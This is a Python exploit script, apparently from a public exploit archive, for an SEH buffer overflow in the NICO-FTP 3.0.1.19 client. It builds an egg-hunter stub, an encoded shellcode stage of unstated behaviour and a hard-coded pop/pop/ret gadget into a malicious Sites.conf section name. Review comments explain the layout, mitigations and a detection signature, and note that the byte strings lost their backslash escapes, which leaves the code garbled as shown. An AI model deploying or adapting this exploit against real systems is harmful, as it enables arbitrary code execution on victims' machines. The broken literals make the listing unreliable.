# Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
# Date: 2018-10-04
# Platforms: Windows
# Author: Miguel Mendez Z
# Vendor: Nico-FTP
# Version: 3.0.1.19
# Tested on: Windows XP_sp3 [es]/ Windows 7_x86 [eng]

#!/usr/bin/python

import struct

# Bad Byte: x0ax0bx0cx0dx0ex0fx5d
#
# NOTE(review): every byte string in this file is written as "x66x81..." with
# no backslashes, so as the file stands each literal is plain ASCII text and
# len() counts three characters per intended byte. The offsets below (4132,
# 4881) therefore do not correspond to what the author measured; presumably
# the "\x" escapes were lost when the listing was extracted -- confirm against
# the original before reasoning about the buffer layout. The shebang also sits
# on a line that is not the first line of the file, so it has no effect.
#
# `happy`: a short first-stage stub followed by a run of 50 "x90" (NOP) bytes.
# The stub contains "xb8 x30x52x31x53", i.e. it loads the same 4-byte tag that
# `shell` is prefixed with, so this looks like an egg-hunter that scans memory
# for that tag -- TODO confirm by disassembling.
happy = (
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3c"
"x05x5ax74xefxb8x30x52x31x53x8bxfaxafx75"
"xeaxafx75xe7xffxe7")
happy += "x90"*50

# `shell`: the 4-byte tag written twice (the "egg", per the S1R0 comment),
# 8 NOPs, then an opaque encoded second stage whose behaviour is not stated
# anywhere on this page, and 30 trailing NOPs.
shell = "x30x52x31x53"*2 # S1R0
shell += "x90"*8
shell += (
"x6ax30x59xd9xeexd9x74x24xf4x5bx81x73x13"
"x25xa8xbex1cx83xebxfcxe2xf4xd9x40x3cx1c"
"x25xa8xdex95xc0x99x7ex78xaexf8x8ex97x77"
"xa4x35x4ex31x23xccx34x2ax1fxf4x3ax14x57"
"x12x20x44xd4xbcx30x05x69x71x11x24x6fx5c"
"xeex77xffx35x4ex35x23xf4x20xaexe4xafx64"
"xc6xe0xbfxcdx74x23xe7x3cx24x7bx35x55x3d"
"x4bx84x55xaex9cx35x1dxf3x99x41xb0xe4x67"
"xb3x1dxe2x90x5ex69xd3xabxc3xe4x1exd5x9a"
"x69xc1xf0x35x44x01xa9x6dx7axaexa4xf5x97"
"x7dxb4xbfxcfxaexacx35x1dxf5x21xfax38x01"
"xf3xe5x7dx7cxf2xefxe3xc5xf7xe1x46xaexba"
"x55x91x78xc2xbfx91xa0x1axbex1cx25xf8xd6"
"x2dxaexc7x39xe3xf0x13x4exa9x87xfexd6xba"
"xb0x15x23xe3xf0x94xb8x60x2fx28x45xfcx50"
"xadx05x5bx36xdaxd1x76x25xfbx41xc9x46xc9"
"xd2x7fx25xa8xbex1c")
shell += "x90"*30

# Buffer layout. `lol` is a plausible-looking host name plus 50 spaces; the
# "x41" filler is sized so that `shell` and `happy` end exactly at offset 4132
# from the start of the section name, which the author evidently measured as
# the position of the SEH record.
lol = "ftp.pwnd.com"+" "*50
padding = lol+"x41"*(4132-(len(shell)+len(happy)+len(lol)))
# Next-SEH slot: "xEB x90" decodes as a short backwards jump (displacement
# -0x70). Given the 30 + 50 NOP bytes placed immediately before this slot, the
# target would presumably be inside that NOP run, sliding into `happy` -- confirm.
next_se = "xEBx90x90x90"
# SEH handler slot: a pop/pop/ret gadget at a fixed address inside the main
# executable (author's comment). A hard-coded address in NicoFtp3.exe means that
# module is not ASLR-rebased -- the "(ASLR)" in the title refers to the OS, not
# this binary. Building the executable with /DYNAMICBASE and /SAFESEH would
# remove this gadget; the latter alone would reject a handler outside the
# registered-handler table.
seh_han = struct.pack("<I",0x00422B46) #pop ecx - pop ebp - ret 0x04 -> NicoFtp3.exe
# Named `nops` but is whitespace: pads the record out to 4881 bytes relative to
# len(padding) only, not the full payload length -- presumably tuned by hand.
nops = " "*(4881-len(padding))

payload = padding+shell+happy+next_se+seh_han+nops

# Trigger: the whole payload is written as the bracketed section name of one
# entry in Sites.conf; the parsing of that file by the client is not shown here.
# `file` shadows the builtin and the handle is closed by hand -- `with open(...)`
# is the idiom. Under Python 3 'w' opens a text stream; that only matters once
# the escapes are restored and the literals stop being pure ASCII.
# Detection note: a Sites.conf whose section name is several KB long is an easy
# file-content signature for this trigger.
file = open('Sites.conf','w')
file.write('['+payload+'] Host= Port= UserName= Password= Anonymous=1 Passive=2 UseProxy=1 LocalDir= HostDir= ')
file.close()